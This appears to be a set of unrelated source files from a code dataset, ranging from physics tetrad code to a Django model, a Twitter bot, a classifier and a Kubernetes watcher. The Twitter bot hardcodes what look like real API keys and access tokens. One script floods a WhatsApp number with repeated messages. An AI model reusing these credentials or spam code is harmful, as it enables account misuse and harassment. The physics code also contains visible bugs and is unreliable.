If no name given (hunt the literature), then use the literature reference as the name.\nTetradChoice = par.initialize_param(par.glb_param(\"char\", thismodule, \"TetradChoice\", \"Approx_QuasiKinnersley\"))\n# Why are these needed?\n# xorig = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"xorig\", \"0.0\"))\n# yorig = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"yorig\", \"0.0\"))\n# zorig = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"zorig\", \"0.0\"))\n# offset = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"offset\", \"1.0e-15\"))\n\n# Step 2: Define the Levi-Civita symbol, used with tetrads <- better description needed.\ndef define_LeviCivitaSymbol(DIM=-1):\n if DIM == -1:\n DIM = par.parval_from_str(\"DIM\")\n\n LeviCivitaSymbol = ixp.zerorank3()\n\n for i in range(DIM):\n for j in range(DIM):\n for k in range(DIM):\n # From https://codegolf.stackexchange.com/questions/160359/levi-civita-symbol :\n LeviCivitaSymbol[i][j][k] = (i - j) * (j - k) * (k - i) / 2\n return LeviCivitaSymbol\n\n# Step 3: Compute the Weyl scalars\ndef WeylScalars():\n # Step 1:\n bssn.BSSN_RHSs()\n\n # Step 2b: Set spatial dimension (must be 3 for BSSN)\n DIM = 3\n par.set_parval_from_str(\"grid::DIM\",DIM)\n\n x = rfm.xxCart[0]\n y = rfm.xxCart[1]\n z = rfm.xxCart[2]\n\n if TetradChoice == \"Approx_QuasiKinnersley\":\n # Eqs 5.6 in https://arxiv.org/pdf/gr-qc/0104063.pdf\n xmoved = x - xorig # Make sure I'm handling coordinates correctly\n ymoved = y - yorig\n zmoved = z - zorig\n\n # Eqs 5.7\n vbU = ixp.zerorank1(\"vbU\")\n vaU = ixp.zerorank1(\"vaU\")\n vcU = ixp.zerorank1(\"vcU\")\n vaU[0] = -ymoved\n vaU[1] = xmoved + offset\n vaU[2] = 0\n vbU[0] = xmoved + offset\n vbU[1] = ymoved\n vbU[2] = zmoved\n LeviCivitaSymbol = define_LeviCivitaSymbol()\n for a in range(DIM):\n for b in range(DIM):\n for c in range(DIM):\n for d in range(DIM):\n vcU[a] += sp.sqrt(bssn.detgammabar) * bssn.gammabarUU[a][d] * LeviCivitaSymbol[d][b][c] * vaU[b] *vbU[c]\n\n # Graham-Schmidt orthonormalization of the tetrad\n waU = ixp.zerorank1(\"waU\")\n wbU = ixp.zerorank1(\"wbU\")\n wcU = ixp.zerorank1(\"wcU\")\n eaU = ixp.zerorank1(\"eaU\")\n ebU = ixp.zerorank1(\"ebU\")\n ecU = ixp.zerorank1(\"ecU\")\n\n waU[a] = vaU[a]\n omega11 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega11 += waU[a] * waU[b] * bssn.gammabarDD[a][b]\n eaU = waU / sp.sqrt(omega11)\n\n omega12 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega12 += eaU[a] * vaU[b] * bssn.gammabarDD[a][b]\n wbU = vbU - omega12*eaU\n omega22 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega22 += wbU[a] * wbU[b] *bssn.gammabarDD[a][b]\n ebU = wbU / sqrt(omega22)\n\n omega13 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega13 += eaU[a] * vcU[b] * bssn.gammabarDD[a][b]\n omega23 = 0\n for a in range(DIM):\n for b in range(DIM):\n omega23 += ebU[a] * vcU[b] * bssn.gammabarDD[a][b]\n wcU = vcU - omega13*eaU - omega23*ebU\n\n # Construct the tetrad\n isqrt2 = 1/sp.sqrt(2)\n ltetU = isqrt2 * ebU\n ntetU = -isqrt2 * ebU\n mtetU = isqrt2 * (ecU + I*eaU)\n mtetbarU = sp.conjugate(mtetU)\n","repo_name":"leowerneck/NRPyIGM","sub_path":"BSSN/WeylScalars.py","file_name":"WeylScalars.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1858201637","text":"import requests\nimport time\nfrom concurrent.futures import ProcessPoolExecutor\n\n\ndef fetch_url_data(pg_url):\n try:\n resp = requests.get(pg_url)\n 
except Exception as e:\n print(f\"Возникла ошибка при получении данных из url: {pg_url}\")\n else:\n return resp.content\n\n\ndef get_all_url_data(url_list):\n with ProcessPoolExecutor() as executor:\n resp = executor.map(fetch_url_data, url_list)\n return resp\n\n\nif __name__ == '__main__':\n url = \"https://www.uefa.com/uefaeuro-2020/\"\n for ntimes in [1, 10, 50, 100, 500]:\n start_time = time.time()\n responses = get_all_url_data([url] * ntimes)\n print(f'Получено {ntimes} результатов запроса за {time.time() - start_time} секунд')\n","repo_name":"pvladimir1989/asyncio","sub_path":"threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1158734301","text":"# 提出する時にはこの部分は含めない\nimport io,sys\nwith open(\"input.txt\") as txt_opend:\n TXT_INPUT = txt_opend.read()\nsys.stdin=io.StringIO(TXT_INPUT)\n# --------------------------------------------------------\n\ndef main():\n N = int(input()) # nは入力回数\n\nif __name__ == '__main__':\n main()","repo_name":"ntatsuyag/techful_training","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2686361096","text":"from django.contrib.auth.models import User\r\nfrom django.db import models\r\n\r\n\r\nclass Snippet(models.Model):\r\n name = models.CharField(max_length=200)\r\n code = models.TextField(max_length=5000)\r\n creation_date = models.DateTimeField()\r\n user = models.ForeignKey(to=User, on_delete=models.CASCADE,\r\n blank=True, null=True) # can be empty due to usage of AnonymousUser\r\n","repo_name":"StepWolf45/Snippets","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"32224263988","text":"\nimport keyboard as a\nimport time\nimport webbrowser as browser\nnumber = str(input(\"Enter the mobile number with country code: +\"))\nmessage = str(input(\"\\nEnter the message you want to send continuously: \"))\ncount = 0\nn=0\nwhile count <= 0:\n try:\n count = int(input(\"\\nHow many times you want to send? 
\"))\n except ValueError:\n print(\"\\nOops!\\nIt seems you have entered a text, please enter a number\")\nprint(\"\\nWhatsapp web will open in 5 seconds\")\ntime.sleep(5)\nlink = \"https://web.whatsapp.com/send?phone=\"+number\nbrowser.open(link)\nprint(\"Message(s) will start sending in 25 seconds with 0.5 second delay between each message\")\n\ntime.sleep(25)\nwhile n 3:\n out_dir = sys.argv[3]\n else:\n out_dir = \".\"\n v = gen_mace4_files(out_dir, n1, n2)\n \n","repo_name":"ChoiwahChow/varieties","sub_path":"src/groups/gen_formulas.py","file_name":"gen_formulas.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21577233105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nfabfile to deploy {{cookiecutter.project_name}} to server\n\n- Requirements:\n fabric==2.0.1\n asn1crypto==0.24.0\n bcrypt==3.1.4\n cffi==1.11.5\n cryptography==2.2.2\n invoke==1.0.0\n paramiko==2.4.1\n pyasn1==0.4.3\n pycparser==2.18\n pynacl==1.2.1\n\n slackclient==1.2.1\n websocket-client==0.47.0\n\n- Usage:\n fab -H my-server deploy\n\n\"\"\"\n\nimport traceback\nimport logging\nfrom slackclient import SlackClient\nfrom fabric import Connection\nfrom invoke import task\n\n# Configuration\n# -----------------------------------------\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nWORK_DIR = '/deploy'\n\n# file storage last git commit id\nLAST_CID_FILE = \"last_commit_id.txt\"\n\n# Config slack for notification\nSLACK_API_KEY = \"xxx-xxx-xxx\"\nCHANNEL_NAME = \"#random\"\n\n\n# Utils functions\n# -----------------------------------------\nclass Slacker:\n COLOR_GOOD = 'good'\n\n sc = SlackClient(SLACK_API_KEY)\n\n def send(self, **kargs):\n try:\n self.sc.api_call(\n \"chat.postMessage\",\n channel=CHANNEL_NAME,\n username='Deployment',\n # as_user=True,\n icon_emoji=\":gear:\",\n **kargs\n )\n except Exception:\n traceback.print_exc()\n\n def send_attachment(self, message_text, title, text, color='good'):\n attachments = [\n {\n \"color\": color,\n \"title\": title,\n \"text\": text,\n },\n ]\n self.send(attachments=attachments, text=message_text)\n\n\nsc = Slacker()\n\n\ndef run(c, command, capture=False):\n result = c.run(command, echo=True)\n if capture:\n return result.stdout.strip()\n return result\n\n\ndef get_current_commit(c):\n return run(c, \"git rev-parse HEAD\", True)\n\n\ndef save_last_commit(c):\n run(c, \"git rev-parse HEAD > {}\".format(LAST_CID_FILE))\n\n\ndef get_last_commit(c):\n return run(c, \"cat {}\".format(LAST_CID_FILE), True)\n\n\ndef get_git_logs(c, last_commit_id, current_commit_id):\n return run(c, \"git log {}...{} --oneline --pretty=format:'%s'\".format(last_commit_id, current_commit_id), True)\n\n\ndef notify_commit_applied(c):\n last_commit_id = get_last_commit(c)\n current_commit_id = get_current_commit(c)\n commit_applied = get_git_logs(c, last_commit_id, current_commit_id)\n if commit_applied:\n commit_applied = \"••• \" + commit_applied\n commit_applied = commit_applied.replace(\"\\n\", \"\\n••• \")\n else:\n commit_applied = 'No commit applied!'\n\n sc.send_attachment(\"Deploy to *{}* success\".format(c.host), \"Commit applied:\", commit_applied)\n\n\ndef notify_start_deploy(c):\n user = c.local('whoami').stdout\n sc.send(text=\"Sender ({}) - Started by user {}\".format(c.host, user))\n\n\n@task\ndef deploy(c):\n notify_start_deploy(c)\n logger.info(\"Deploying on {}\".format(c.host))\n with c.cd(WORK_DIR):\n if c.run('test -f 
{}'.format(LAST_CID_FILE), warn=True).failed:\n logger.info(\"Create {} file\".format(LAST_CID_FILE))\n save_last_commit(c)\n run(c, 'git pull origin master')\n docker_restart(c)\n notify_commit_applied(c)\n save_last_commit(c)\n\n\ndef docker_restart(c):\n run(c, 'docker-compose restart {{cookiecutter.project_slug}}')\n","repo_name":"cuongtransc/cookiecutter-simple-django","sub_path":"{{cookiecutter.project_slug}}/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11784551853","text":"with open('07.txt') as file:\n nums = [int(x) for line in file.readlines() for x in line.split(',')]\n nums.sort()\n\nmedian = nums[len(nums)//2]\nfuel_part_1 = sum((abs(median - num) for num in nums))\nprint(f'DAY 7 | PART 1: {fuel_part_1}')\n\navg = sum(nums)/len(nums)\nlower, upper = int(avg), int(avg) + 1\nfuel1 = sum(sum(range(1, abs(lower - num) + 1)) for num in nums)\nfuel2 = sum(sum(range(1, abs(upper - num) + 1)) for num in nums)\n\n# fuel = sum(sum(range(1, abs(avg - num) + 1)) for num in nums)\n# fuel = sum(map(lambda x: (abs(avg - x) * (abs(avg - x) + 1)) / 2, nums))\nprint(f'DAY 7 | PART 2: {fuel1 if fuel1 < fuel2 else fuel2}')","repo_name":"thunguy/AdventOfCode","sub_path":"2021/DAY7.py","file_name":"DAY7.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4571357077","text":"from typing import Optional\n\nfrom wand.image import Image\n\n\nGRAVITY_MATCH = {\n 'nw': 'north_west',\n 'n': 'north',\n 'ne': 'north_east',\n 'w': 'west',\n 'c': 'center',\n 'e': 'east',\n 'sw': 'south_west',\n 's': 'south',\n 'se': 'south_east',\n}\n\n\ndef handle_crop(image: Image, params: str):\n gravity = params[:2]\n if gravity not in GRAVITY_MATCH:\n gravity = params[:1]\n if gravity not in GRAVITY_MATCH:\n gravity = 'c'\n else:\n params = params[1:]\n else:\n params = params[2:]\n\n width, height = [int(p) for p in params.split('x')]\n image.crop(width=width, height=height, gravity=GRAVITY_MATCH[gravity])\n\n\ndef process_image(source_image: Image, operations_string: str) -> Optional[Image]:\n operations = operations_string.split('/')\n image = source_image.clone()\n\n while len(operations) > 1:\n operation = operations.pop(0)\n params = operations.pop(0)\n\n if operation == 'crop':\n handle_crop(image, params)\n\n if operation == 'resize':\n image.transform(resize=params)\n\n if operation == 'rotate':\n image.rotate(int(params))\n\n return image\n","repo_name":"hypnocapybara/images-server","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"14307790638","text":"class Node:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n self.north = None\r\n self.south = None\r\n self.east = None\r\n self.west = None\r\n \r\n def __str__(self):\r\n return f\"Node({self.x}, {self.y})\"\r\n \r\n def link(self, other):\r\n if other.x == self.x - 1 and other.y == self.y:\r\n self.north = other\r\n other.south = self\r\n elif other.x == self.x + 1 and other.y == self.y:\r\n self.south = other\r\n other.north = self\r\n elif other.x == self.x and other.y == self.y - 1:\r\n self.west = other\r\n other.east = self\r\n elif other.x == self.x and other.y == self.y + 1:\r\n self.east = other\r\n other.west = self\r\n\r\n\r\nclass 
UndirectedGraph:\r\n def __init__(self, row, col):\r\n self.row = row\r\n self.col = col\r\n self.matrix = [[Node(x, y) for y in range(col)] for x in range(row)]\r\n for x in range(row):\r\n for y in range(col):\r\n if x > 0:\r\n self.matrix[x][y].link(self.matrix[x-1][y])\r\n if x < row - 1:\r\n self.matrix[x][y].link(self.matrix[x+1][y])\r\n if y > 0:\r\n self.matrix[x][y].link(self.matrix[x][y-1])\r\n if y < col - 1:\r\n self.matrix[x][y].link(self.matrix[x][y+1])\r\n \r\n def __str__(self):\r\n res = []\r\n for x in range(self.row):\r\n for y in range(self.col):\r\n obj = self.matrix[x][y]\r\n res.append(f\"Node({obj.x}, {obj.y}): north={obj.north}, south={obj.south}, east={obj.east}, west={obj.west}\")\r\n return \"\\n\".join(res)\r\n\r\nif __name__ == \"__main__\":\r\n matrix = UndirectedGraph(3, 4)\r\n print(matrix)\r\n","repo_name":"akiki19950827/gen_hdl_top","sub_path":"undirected_graph_lib/UndirectedGraph.py","file_name":"UndirectedGraph.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74661682658","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.bucket, name='bucket'),\n path('get-bucket-files/', views.get_bucket_files, name='get-bucket-files'),\n path('download-bucket-file', views.download_bucket_file, \n name='download-bucket-file'),\n path('copy-file', views.copy_files, name='copy-file'),\n\n path('download', views.download_files, name=\"download\"),\n\n\n # \n path('export-data', views.export_data, name='export-data'),\n]\n","repo_name":"gorakshsanas92/aws-s3-bucket-file-download-transfer","sub_path":"bucket/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4280126916","text":"from src.benchling.utils.auth_utils import APIConnector\nfrom src.utils.base_classes import BaseClass\n\nclass BenchlingConnection(BaseClass):\n def __init__(self, client_id, benchling_tenant, secret_key, token_url):\n self.tenant = benchling_tenant\n self.secret_key = secret_key\n self.client_id = client_id\n self.token_url = token_url\n self.get_store_token()\n\n def get_store_token(self):\n self._auth_object = APIConnector(self.token_url, self.client_id, self.secret_key)\n if self._auth_object:\n print('BenchlingConnection initialized')\n else:\n raise (Exception(\"APIConnector failed to make _auth_object.\"))\n self.token = self._auth_object.token\n ","repo_name":"htgt/SGE-RESTful-Layer","sub_path":"src/benchling/utils/connection_class.py","file_name":"connection_class.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36999422745","text":"def main():\n N = int(input())\n card = list(range(1, N + 1))\n\n while True:\n print(card.pop(0), end=' ')\n if not card:\n break\n card.append(card.pop(0))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TopGun1405/BaekJoonOJ-Python","sub_path":"BOJ_N-2000-2499/BOJ_N-2161.py","file_name":"BOJ_N-2161.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25288529261","text":"import tweepy\r\n# 트위터 api\r\nfrom neispy import Neispy\r\n# 교육청 api\r\nfrom datetime import datetime\r\n# 현재 시간 가져오기 위함\r\nimport sys\r\n\r\n# twitter developer에서 아래의 값들을 구할 수 잇음.\r\n# 
https://developer.twitter.com/en\r\n# 트위터 Consumer Keys\r\napikey = 'WwxGR0uarHBtkMQyhHnU2v9Rv'\r\napisecret = 'hKWh82mXxeauj5W4nyVsKOiV1xR9YG1JjTAKA0pPGiFsDA7OQS'\r\n# 트위터 Authentication Tokens\r\naccess_token = '1390944695530885126-ZZtkZXRBnNAu7QpOG7aESPKnDcrmt1'\r\naccess_token_secret = 'RvAXnxswqGa1uhjIvqlYbL3KTlnxR870Dse8RQms3YuxR'\r\n\r\n# tweepy 설정\r\n# 이부분은 그냥 tweepy에서 하라는데로 한 것..\r\nauth = tweepy.OAuthHandler(apikey, apisecret)\r\nauth.set_access_token(access_token,access_token_secret)\r\napi = tweepy.API(auth)\r\n\r\n#학교 이름, 변경하지 말것\r\nname = \"한국애니메이션고등학교\"\r\n\r\n# 트위터에 트윗하는 함수\r\n# message : 트윗할 내용 \r\ndef Twit(message):\r\n print(message)\r\n try:\r\n api.update_status(message)\r\n # tweepy로 트윗\r\n except Exception as e: \r\n print(e)\r\n # Exception 발생 시 터미널에 출력\r\n\r\n# 급식 정보를 가져오는 함수\r\n# pMealtime : 급식의 index를 받아옴 \r\n# 그러나 위탁급식으로 인해 점심밖에 제공되지 않음, 0으로 고정\r\ndef GetMeal(pMealtime):\r\n\r\n # neispy 설정 \r\n neis = Neispy.sync()\r\n\r\n scinfo = neis.schoolInfo(SCHUL_NM=name)\r\n AE = scinfo[0].ATPT_OFCDC_SC_CODE \r\n SE = scinfo[0].SD_SCHUL_CODE \r\n\r\n Year = datetime.today().strftime(\"%Y\")\r\n Month = datetime.today().strftime(\"%m\")\r\n Date = datetime.today().strftime(\"%d\")\r\n\r\n # 최종적으로 출력될 값\r\n # 원래는 아침 점심 저녁을 전부 출력해줬으나\r\n # 위탁급식으로 변경 후 neispy에서 아침 / 저녁을 가져올 수 없어서\r\n # 점심으로 고정해놨음.\r\n outputString = ('{}년 {}월 {}일\\n한국애니메이션고등학교 점심입니다.\\n'.format(Year,Month,Date))\r\n\r\n try:\r\n mealData = neis.mealServiceDietInfo(AE, SE, MLSV_YMD=int(datetime.today().strftime(\"%Y%m%d\")))\r\n mealString = mealData[pMealtime].DDISH_NM.replace(\"
    \", \"\\n\")\r\n outputString += mealString\r\n except Exception as e:\r\n # neispy에서 가끔 api 문제가 생김\r\n # 이 경우 출력값을 비우고 에러를 터미널에 출력\r\n print(e)\r\n outputString = \"\"\r\n\r\n return outputString\r\n\r\ndef main():\r\n # 인자로 run이 들어온 경우에만 출력\r\n # heroku에서는 앱이 업로드되면 일단 실행됨\r\n # 그러므로 scehduler에 의해서만 실행 가능하도록 인자를 설정\r\n # C++의 char* argv[], C#의 string args[] 같은거라고 생각하면 편함. \r\n arg = sys.argv[sys.argv.__len__()-1] \r\n if arg == 'run':\r\n Twit(GetMeal(0))\r\n elif arg == 'test':\r\n Twit('Testing')\r\n\r\n# main함수 실행\r\nmain()","repo_name":"s53809/KAHMealBot","sub_path":"MealBot/KAHMealBot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7765040835","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport geoposition.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('romani', '0058_auto_20170128_1249'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='geo_punt',\n field=geoposition.fields.GeopositionField(max_length=42, default=1),\n preserve_default=False,\n ),\n ]\n","repo_name":"wkov/labiadas","sub_path":"romani/migrations/0059_userprofile_geo_punt.py","file_name":"0059_userprofile_geo_punt.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32408254614","text":"# import libraries\nimport sys\n\nimport pandas as pd\nimport numpy as np\nfrom sqlalchemy import create_engine\n\n# download necessary NLTK data\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\nnltk.download(['punkt', 'wordnet'])\n\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import classification_report ,precision_score,accuracy_score,recall_score\n\nimport pickle\n\n\ndef load_data(database_filepath):\n \"\"\"\n Loads the SqliteDB table based on given filepath\n Input:\n database_filepath - Path of the DB file\n Output:\n X - Dataframe of input features\n Y - Target variables\n List of target variable names\n \"\"\"\n# engine = create_engine('sqlite:///InsertDatabaseName.db')\n engine = create_engine('sqlite:///'+database_filepath)\n df = pd.read_sql_table('cleanedmessage',engine)\n \n print( \"Target label that dont have variance\" + str( list(df.columns[df.sum()==0]) ) )\n X = df.message\n #Drop child_alone feature as they only have one class\n Y = df[['related', 'request', 'offer', 'aid_related', 'medical_help', 'medical_products', 'search_and_rescue', 'security', 'military', 'water', 'food', 'shelter', 'clothing', 'money', 'missing_people', 'refugees', 'death', 'other_aid', 'infrastructure_related', 'transport', 'buildings', 'electricity', 'tools', 'hospitals', 'shops', 'aid_centers', 'other_infrastructure', 'weather_related', 'floods', 'storm', 'fire', 'earthquake', 'cold', 'other_weather', 'direct_report']]\n \n #feature related which is an indicator field is having value as 2 .As that is not possible replacing 2 with 0\n Y.loc[Y.related==2,'related']=0\n Y.iloc[:,:] = 
Y.iloc[:,:].astype(bool)\n \n return X,Y ,list(Y.columns)\n\n\ndef tokenize(text):\n '''\n Input:\n Raw text message\n Output:\n Tokenized text\n '''\n clean_tkn = []\n tken = word_tokenize(text)\n lmtzr = WordNetLemmatizer()\n \n for tok in tken:\n clean_tk = lmtzr.lemmatize(tok).lower().strip()\n clean_tkn.append(clean_tk)\n\n return clean_tkn\n\n\ndef build_model():\n \"\"\"\n Builts and return cross validation pipeline with data transformation and classification steps\n \"\"\"\n vect = CountVectorizer(tokenizer=tokenize)\n tfid_trn = TfidfTransformer()\n clf = MultiOutputClassifier(LogisticRegression())\n \n pipeline = Pipeline([\n ('vect_stp', CountVectorizer(tokenizer=tokenize)),\n ('tfid_trn_stp', TfidfTransformer()),\n ('clf_stp', MultiOutputClassifier(LogisticRegression()) )] )\n \n parameters = {'clf_stp__n_jobs': [1, 2, 4] }\n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv\n \ndef f_score(func,y_test,y_hat):\n \"\"\"\n Input:\n func - metric function \n y_test - Actual target variable\n y_hat - predicted target values\n Output:\n returns metric for all the target variable as dataframe\n \"\"\"\n score_df=pd.DataFrame( np.zeros(y_test.shape[1]) )\n for x in np.arange(y_test.shape[1]):\n score_df.loc[x,0]=func(y_test.iloc[:,x],y_hat.iloc[:,x])\n return score_df\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"\n Displays the Accuracy , recall and precision metrics for each of the target variable\n Input:\n model - trained model for evaluation\n X_test - Dataframe of input features\n Y_test - Actual target values\n category_names - List of target variable names\n \"\"\"\n Y_test_pred=pd.DataFrame(model.predict(X_test) ,columns=category_names )\n \n recall_met=f_score(recall_score,Y_test,Y_test_pred)\n prec_met=f_score(precision_score,Y_test,Y_test_pred)\n acc_met=f_score(accuracy_score,Y_test,Y_test_pred)\n\n result = pd.concat([acc_met,recall_met, prec_met], axis=1, join='inner')\n\n result.columns=['accuracy','recall','precision']\n result.set_axis( category_names , inplace=True )\n print('Metrics of each of the target variable')\n print('-------------------------------------------------------------------------------------------')\n print(result)\n print('-------------------------------------------------------------------------------------------')\n\n\ndef save_model(model, model_filepath):\n \"\"\"Save model in path using pickle\"\"\"\n pickle.dump( model, open(model_filepath, 'wb') )\n \n\n\ndef main():\n \"\"\"\n Main execution block\n \"\"\"\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n #select the best estimator from the cross validation\n bst_model=model.best_estimator_\n \n print('Evaluating model...')\n evaluate_model(bst_model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(bst_model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. 
\\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"kingkovai/Disaster_response","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4614165731","text":"import base64\nimport os\nfrom multiprocessing import Process\nfrom time import sleep\n\nfrom kubernetes import client, watch\nfrom kubernetes.client.rest import ApiException\nfrom urllib3.exceptions import ProtocolError\n\nfrom helpers import request, writeTextToFile, removeFile\n\n_list_namespaced = {\n \"secret\": \"list_namespaced_secret\",\n \"configmap\": \"list_namespaced_config_map\"\n}\n\n_list_for_all_namespaces = {\n \"secret\": \"list_secret_for_all_namespaces\",\n \"configmap\": \"list_config_map_for_all_namespaces\"\n}\n\n\ndef _get_file_data_and_name(full_filename, content, resource):\n if resource == \"secret\":\n file_data = base64.b64decode(content).decode()\n else:\n file_data = content\n\n if full_filename.endswith(\".url\"):\n filename = full_filename[:-4]\n file_data = request(file_data, \"GET\").text\n else:\n filename = full_filename\n\n return filename, file_data\n\n\ndef listResources(label, targetFolder, url, method, payload, current, folderAnnotation, resource):\n v1 = client.CoreV1Api()\n namespace = os.getenv(\"NAMESPACE\", current)\n if namespace == \"ALL\":\n ret = getattr(v1, _list_for_all_namespaces[resource])()\n else:\n ret = getattr(v1, _list_namespaced[resource])(namespace=namespace)\n\n for sec in ret.items:\n destFolder = targetFolder\n metadata = sec.metadata\n if metadata.labels is None:\n continue\n print(f'Working on {resource}: {metadata.namespace}/{metadata.name}')\n if label in sec.metadata.labels.keys():\n print(f\"Found {resource} with label\")\n if sec.metadata.annotations is not None:\n if folderAnnotation in sec.metadata.annotations.keys():\n destFolder = sec.metadata.annotations[folderAnnotation]\n\n dataMap = sec.data\n if dataMap is None:\n print(f\"No data field in {resource}\")\n continue\n\n if label in sec.metadata.labels.keys():\n for data_key in dataMap.keys():\n filename, filedata = _get_file_data_and_name(data_key, dataMap[data_key],\n resource)\n writeTextToFile(destFolder, filename, filedata)\n\n if url is not None:\n request(url, method, payload)\n\n\ndef _watch_resource_iterator(label, targetFolder, url, method, payload,\n current, folderAnnotation, resource):\n v1 = client.CoreV1Api()\n namespace = os.getenv(\"NAMESPACE\", current)\n if namespace == \"ALL\":\n stream = watch.Watch().stream(getattr(v1, _list_for_all_namespaces[resource]))\n else:\n stream = watch.Watch().stream(getattr(v1, _list_namespaced[resource]), namespace=namespace)\n\n for event in stream:\n destFolder = targetFolder\n metadata = event['object'].metadata\n if metadata.labels is None:\n continue\n print(f'Working on {resource} {metadata.namespace}/{metadata.name}')\n if label in event['object'].metadata.labels.keys():\n print(f\"{resource} with label found\")\n if event['object'].metadata.annotations is not None:\n if folderAnnotation in event['object'].metadata.annotations.keys():\n destFolder = event['object'].metadata.annotations[folderAnnotation]\n print('Found a folder override annotation, '\n f'placing the {resource} in: {destFolder}')\n dataMap = event['object'].data\n if dataMap is None:\n print(f\"{resource} does not have 
data.\")\n continue\n eventType = event['type']\n for data_key in dataMap.keys():\n print(f\"File in {resource} {data_key} {eventType}\")\n\n if (eventType == \"ADDED\") or (eventType == \"MODIFIED\"):\n filename, filedata = _get_file_data_and_name(data_key, dataMap[data_key],\n resource)\n writeTextToFile(destFolder, filename, filedata)\n\n if url is not None:\n request(url, method, payload)\n else:\n filename = data_key[:-4] if data_key.endswith(\".url\") else data_key\n removeFile(destFolder, filename)\n if url is not None:\n request(url, method, payload)\n\n\ndef _watch_resource_loop(*args):\n while True:\n try:\n _watch_resource_iterator(*args)\n except ApiException as e:\n if e.status != 500:\n print(f\"ApiException when calling kubernetes: {e}\\n\")\n else:\n raise\n except ProtocolError as e:\n print(f\"ProtocolError when calling kubernetes: {e}\\n\")\n except Exception as e:\n print(f\"Received unknown exception: {e}\\n\")\n\n\ndef watchForChanges(label, targetFolder, url, method, payload,\n current, folderAnnotation, resources):\n\n firstProc = Process(target=_watch_resource_loop,\n args=(label, targetFolder, url, method, payload,\n current, folderAnnotation, resources[0])\n )\n firstProc.start()\n\n if len(resources) == 2:\n secProc = Process(target=_watch_resource_loop,\n args=(label, targetFolder, url, method, payload,\n current, folderAnnotation, resources[1])\n )\n secProc.start()\n\n while True:\n if not firstProc.is_alive():\n print(f\"Process for 